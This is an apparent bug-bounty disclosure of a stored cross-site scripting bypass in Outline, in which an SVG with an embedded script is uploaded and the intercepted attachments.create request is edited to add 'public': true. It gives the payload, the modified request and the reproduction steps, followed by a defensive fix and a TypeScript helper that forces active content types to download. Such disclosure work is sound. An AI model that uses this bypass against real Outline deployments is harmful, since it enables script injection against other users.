[Bypass] Cross-site Scripting (XSS) via file upload in outline/outline
Reported on Jul 17th 2022
🔒️ Requirements
Privileges: User.
📝 Description
I found a bypass to this report by uploading the file with the "public": true parameter. This is due to the fact that the AWS bucket's public folder does not auto-download files when we access them.
🕵️‍♂️ Proof of Concept
Step 1: Go to your outline home and create a new note.
Step 2: Start Burp Suite with proxy -> Intercept is on.
Step 3: Add the following .svg file to the note by typing /file and [ENTER].
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">
alert("XSS");
</script>
</svg>
Step 4: On Burp Suite, press Forward until you see:
POST /api/attachments.create HTTP/1.1
Host: esaipslack.getoutline.com
Content-Length: 111
...
Connection: close
{
"documentId": "b4f14bcb-d6c0-4439-8380-324c1abf00ca","contentType": "image/svg+xml",
"size":129,
"name":"xss.svg"
}
Step 5: Add "public": true, inside the JSON.
{
"public": true,
"documentId": "b4f14bcb-d6c0-4439-8380-324c1abf00ca",
"contentType": "image/svg+xml",
"size": 129,
"name": "xss.svg"
}
Step 6: Forward and turn Intercept to off.
Step 7: Go to your note and click the file.
[Screenshots: File, XSS]
🔨 Fix
To fix this vulnerability, I suggest you force download on the public part of the AWS bucket too.
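As an added illustration of that fix (example code, not Outline's own), the helper below decides the headers an uploaded attachment must be served with: a browser-renderable format such as image/svg+xml is always forced to download, and the client-supplied "public" flag only controls access, never inline rendering. The type names, the list of active content types and the filename sanitiser are assumptions for this example.

```typescript
// Added example, not code from the Outline project.
// Decide how an uploaded attachment is served so that formats a browser
// renders as a document (and may run script from) cannot execute in the
// application's origin, whether or not the client sent "public": true.

interface AttachmentRequest {
  name: string;
  contentType: string;
  size: number;
  public?: boolean; // client-controlled, as in the intercepted request above
}

interface ServeHeaders {
  "Content-Type": string;
  "Content-Disposition": string;
  "X-Content-Type-Options": "nosniff";
}

// Constructed list of content types a browser will render inline as a
// document; extend it to match what the deployment accepts.
const ACTIVE_CONTENT_TYPES = new Set([
  "image/svg+xml",
  "text/html",
  "application/xhtml+xml",
  "text/xml",
  "application/xml",
]);

function isActiveContent(contentType: string): boolean {
  // Drop parameters such as "; charset=utf-8" and normalise case before lookup.
  const mime = contentType.split(";")[0].trim().toLowerCase();
  return ACTIVE_CONTENT_TYPES.has(mime);
}

// Keep the filename ASCII and free of quotes, backslashes and CR/LF so the
// value cannot break out of the Content-Disposition header.
function safeFilename(name: string): string {
  const cleaned = name.replace(/[^\x20-\x7e]/g, "").replace(/["\\\r\n]/g, "");
  return cleaned.length > 0 ? cleaned : "download";
}

// "public" decides who may fetch the object; active content is forced to
// download regardless, and nosniff stops the browser second-guessing the type.
function serveHeaders(req: AttachmentRequest): ServeHeaders {
  const disposition = isActiveContent(req.contentType) ? "attachment" : "inline";
  return {
    "Content-Type": req.contentType,
    "Content-Disposition": `${disposition}; filename="${safeFilename(req.name)}"`,
    "X-Content-Type-Options": "nosniff",
  };
}
```

When the public folder is served straight from the bucket with no application code in front of it, the same Content-Disposition value has to be stored as the object's metadata at upload time, otherwise the check above never runs for those requests.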
Impact
An attacker could use it to get sensitive information stored in the AWS bucket.